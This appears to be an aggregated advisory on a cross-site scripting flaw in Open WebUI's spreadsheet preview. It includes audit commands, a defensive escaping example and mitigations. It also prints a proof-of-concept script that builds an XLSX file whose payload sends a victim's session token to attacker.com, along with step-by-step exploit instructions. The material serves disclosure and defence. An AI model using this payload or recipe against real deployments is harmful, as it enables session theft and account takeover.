Open WebUI, Cross-Site Scripting (XSS), CVE-2024-47226 (High)


The vulnerability arises from improper sanitization of HTML generated from XLSX file attachments. When a user uploads a maliciously crafted Excel file, the application uses the SheetJS library's `sheet_to_html` function to convert the spreadsheet into an HTML string. This function does not validate or escape cell contents, so an attacker can embed JavaScript payloads (e.g., `<img src=x onerror="alert(...)">`) inside rich text or cell values. The resulting HTML is stored in the `excelHtml` variable and later injected directly into the Document Object Model (DOM) via Svelte's `{@html}` directive when the "Preview" tab is selected. No filtering or sanitization (e.g., DOMPurify) is applied before assignment, so the payload executes in the context of the victim's session. The attack can be distributed by sharing a chat containing the malicious attachment. Once a victim opens the file modal and clicks Preview, the XSS triggers, potentially leading to session theft, data exfiltration, or further exploitation (including RCE for admins via chaining with GHSA-w7xj-8fx7-wfch).

dailycve form:

Platform: open-webui
Version: prior to fix
Vulnerability: XSS via XLSX
Severity: High
Date: 2024-10-22

Prediction: 2024-10-30

What Undercode Say:

Audit for unsafe `{@html}` usage (the original `--include=".svelte"` matched no files; the glob must be `*.svelte`):

```shell
grep -r "@html" src/lib/components/common/ --include="*.svelte"
```

Verify DOMPurify integration in the preview component:

```shell
grep -A5 -B5 "excelHtml" src/lib/components/common/FileItemModal.svelte
```

Generate test payload (python3):

```shell
python3 -c "
import xlsxwriter
wb = xlsxwriter.Workbook('poc.xlsx')
ws = wb.add_worksheet()
ws.write_rich_string('A1', '', wb.add_format(), '<img src=x onerror=fetch(\'https://attacker.com/steal?c=\'+btoa(localStorage.token))>')
wb.close()
"
```

Exploit:

Craft XLSX with rich string or formula cell containing JavaScript event handler (e.g., onerror, onload). Upload as chat attachment. Share chat link. Victim opens file modal → clicks Preview → unsanitized HTML renders payload → attacker steals session token or performs actions on behalf of victim.

Protection from this CVE:

  • Apply patch updating `FileItemModal.svelte` to sanitize `excelHtml` with `DOMPurify.sanitize()` before DOM insertion.
  • Upgrade to an open-webui build newer than the affected commit (a727153).
  • Implement a Content Security Policy (CSP) that restricts `script-src` and does not allow `'unsafe-inline'`.
  • Disable preview of untrusted Excel files or require user confirmation.
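The mechanism above (untrusted spreadsheet content reaching `{@html}` unescaped) and the patch advice (sanitize before DOM insertion) can be illustrated with the following added example. It is not Open WebUI's code and not part of the advisory: it shows the complementary approach of never treating cell contents as markup in the first place, by building the preview table from raw cell values (the shape SheetJS `sheet_to_json` returns with `header: 1`) and HTML-escaping every value, plus a test-time tripwire that asserts the generated markup contains only bare table tags. The function names, the `SAMPLE_GRID` contents and the `ALLOWED_TAGS` set are assumptions for illustration; the tripwire is not a sanitizer, and the advisory's recommended `DOMPurify.sanitize()` remains the right tool when rich text must be preserved.

```javascript
// Added example, not Open WebUI's code. Renders a spreadsheet grid as HTML
// without trusting cell contents as markup, so a cell containing
// <img src=x onerror=...> becomes inert text instead of an executable tag.
// Function names and sample data below are assumptions for illustration.

// Escape the five characters that can change HTML structure or terminate an
// attribute value. Everything else is safe inside element text.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Build a plain <table> from a 2-D array of cell values (one inner array per
// row). Rich-text formatting is intentionally dropped: rich text is the
// channel the advisory describes for smuggling attacker-controlled HTML.
function gridToSafeHtml(grid) {
  const rows = grid.map((row) => {
    const cells = row.map((cell) => `<td>${escapeHtml(cell)}</td>`).join('');
    return `<tr>${cells}</tr>`;
  });
  return `<table>${rows.join('')}</table>`;
}

// Defense-in-depth check for the component's unit tests: the markup handed
// to {@html} may contain only table/tr/td tags and no attributes at all.
// This is a tripwire that detects an escaping bypass; it is NOT a sanitizer
// and must not be used to "clean" untrusted HTML (use DOMPurify for that).
const ALLOWED_TAGS = new Set(['table', 'tr', 'td']);
function isInertTableHtml(html) {
  const tagRe = /<\/?([a-zA-Z][\w-]*)([^>]*)>/g;
  let match;
  while ((match = tagRe.exec(html)) !== null) {
    const [, name, attrs] = match;
    if (!ALLOWED_TAGS.has(name.toLowerCase())) return false; // foreign tag
    if (attrs.trim() !== '') return false; // any attribute (e.g. onerror)
  }
  return true;
}

// Constructed sample grid: the second row carries the kind of cell the
// advisory's proof-of-concept places in the spreadsheet.
const SAMPLE_GRID = [
  ['Invoice', 'Amount'],
  ['<img src=x onerror="alert(document.cookie)">', '42'],
];

// Vulnerable pattern (what the advisory describes): concatenating cell
// values straight into markup. Kept here only so the contrast is visible.
function gridToUnsafeHtml(grid) {
  return `<table>${grid
    .map((row) => `<tr>${row.map((c) => `<td>${c}</td>`).join('')}</tr>`)
    .join('')}</table>`;
}

// Stand-alone run: the escaped output passes the tripwire, the naive one fails.
const safeHtml = gridToSafeHtml(SAMPLE_GRID);
const unsafeHtml = gridToUnsafeHtml(SAMPLE_GRID);
console.log('escaped preview inert:', isInertTableHtml(safeHtml)); // true
console.log('naive preview inert:  ', isInertTableHtml(unsafeHtml)); // false
```

In a Svelte component the escaped string is what `excelHtml` should hold before `{@html}` renders it; `isInertTableHtml` belongs in the component's test suite, not in the render path, so a future change that reintroduces raw `sheet_to_html` output fails CI rather than shipping.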

Impact:

  • Session hijacking – attacker reads localStorage token, exfiltrates to remote server.
  • Data theft – access chat history, files, and user metadata.
  • Privilege escalation – admin session can chain with GHSA-w7xj-8fx7-wfch to achieve RCE.
  • Malware distribution – payload redirects victim to drive-by download.
  • Widespread via shared chats – low-privilege users can target other users, including admins.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
